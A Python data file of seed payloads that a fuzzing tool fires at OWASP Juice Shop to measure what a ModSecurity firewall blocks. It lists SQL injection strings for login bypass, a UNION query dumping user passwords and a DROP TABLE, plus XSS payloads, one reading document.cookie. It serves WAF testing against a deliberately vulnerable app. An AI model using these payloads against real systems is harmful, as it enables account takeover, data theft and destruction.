"""Hand-curated seed payloads targeting real, known-vulnerable Juice Shop surfaces.

Pure data, no logic — core.mutate consumes `type`/`payload`, core.fire consumes
`method`/`endpoint`/`location`/`field`/`extra_fields`.
"""

SEEDS = [
    # --- SQLi: mostly POST /rest/user/login (JSON body, `email` field) ---
    {
        "id": "sqli-01",
        "type": "sqli",
        "payload": "' OR 1=1--",
        "method": "POST",
        "endpoint": "/rest/user/login",
        "location": "json",
        "field": "email",
        "extra_fields": {"password": "x"},
    },
    {
        "id": "sqli-02",
        "type": "sqli",
        "payload": "' OR '1'='1",
        "method": "POST",
        "endpoint": "/rest/user/login",
        "location": "json",
        "field": "email",
        "extra_fields": {"password": "x"},
    },
    {
        "id": "sqli-03",
        "type": "sqli",
        "payload": "admin@juice-sh.op'--",
        "method": "POST",
        "endpoint": "/rest/user/login",
        "location": "json",
        "field": "email",
        "extra_fields": {"password": "x"},
    },
    {
        "id": "sqli-04",
        "type": "sqli",
        "payload": "') OR ('1'='1",
        "method": "POST",
        "endpoint": "/rest/user/login",
        "location": "json",
        "field": "email",
        "extra_fields": {"password": "x"},
    },
    {
        "id": "sqli-05",
        "type": "sqli",
        "payload": "x' UNION SELECT id,email,password,'1','1','1','1','1' FROM Users--",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "sqli-06",
        "type": "sqli",
        "payload": "'; DROP TABLE Products;--",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "sqli-07",
        "type": "sqli",
        "payload": "1' ORDER BY 10--",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "sqli-08",
        "type": "sqli",
        "payload": "' OR 1=1;--",
        "method": "POST",
        "endpoint": "/rest/user/login",
        "location": "json",
        "field": "email",
        "extra_fields": {"password": "x"},
    },
    # --- XSS: GET /rest/products/search (reflected) and POST /api/Feedbacks (persisted) ---
    # Feedbacks entries below send dummy captchaId/captcha values, which Juice
    # Shop's app logic will reject (expect a 401/500, not 200) — that's fine:
    # the WAF evaluates the request before app logic runs, so `blocked` still
    # accurately reflects whether *ModSecurity* let the payload through.
    {
        # Known-answer control: same payload Sprint 1 manually proved gets blocked.
        "id": "xss-01",
        "type": "xss",
        "payload": "<script>alert(1)</script>",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "xss-02",
        "type": "xss",
        "payload": "<img src=x onerror=alert(1)>",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "xss-03",
        "type": "xss",
        "payload": "<svg/onload=alert(1)>",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "xss-04",
        "type": "xss",
        "payload": '<iframe src="javascript:alert(`xss`)">',
        "method": "POST",
        "endpoint": "/api/Feedbacks",
        "location": "json",
        "field": "comment",
        "extra_fields": {"rating": 5, "captchaId": 0, "captcha": "0"},
    },
    {
        "id": "xss-05",
        "type": "xss",
        "payload": '"><script>alert(document.cookie)</script>',
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
    {
        "id": "xss-06",
        "type": "xss",
        "payload": "<body onload=alert(1)>",
        "method": "POST",
        "endpoint": "/api/Feedbacks",
        "location": "json",
        "field": "comment",
        "extra_fields": {"rating": 5, "captchaId": 0, "captcha": "0"},
    },
    {
        "id": "xss-07",
        "type": "xss",
        "payload": '<a href="javascript:alert(1)">click</a>',
        "method": "POST",
        "endpoint": "/api/Feedbacks",
        "location": "json",
        "field": "comment",
        "extra_fields": {"rating": 5, "captchaId": 0, "captcha": "0"},
    },
    {
        "id": "xss-08",
        "type": "xss",
        "payload": "<svg><script>alert(1)</script></svg>",
        "method": "GET",
        "endpoint": "/rest/products/search",
        "location": "query",
        "field": "q",
    },
]
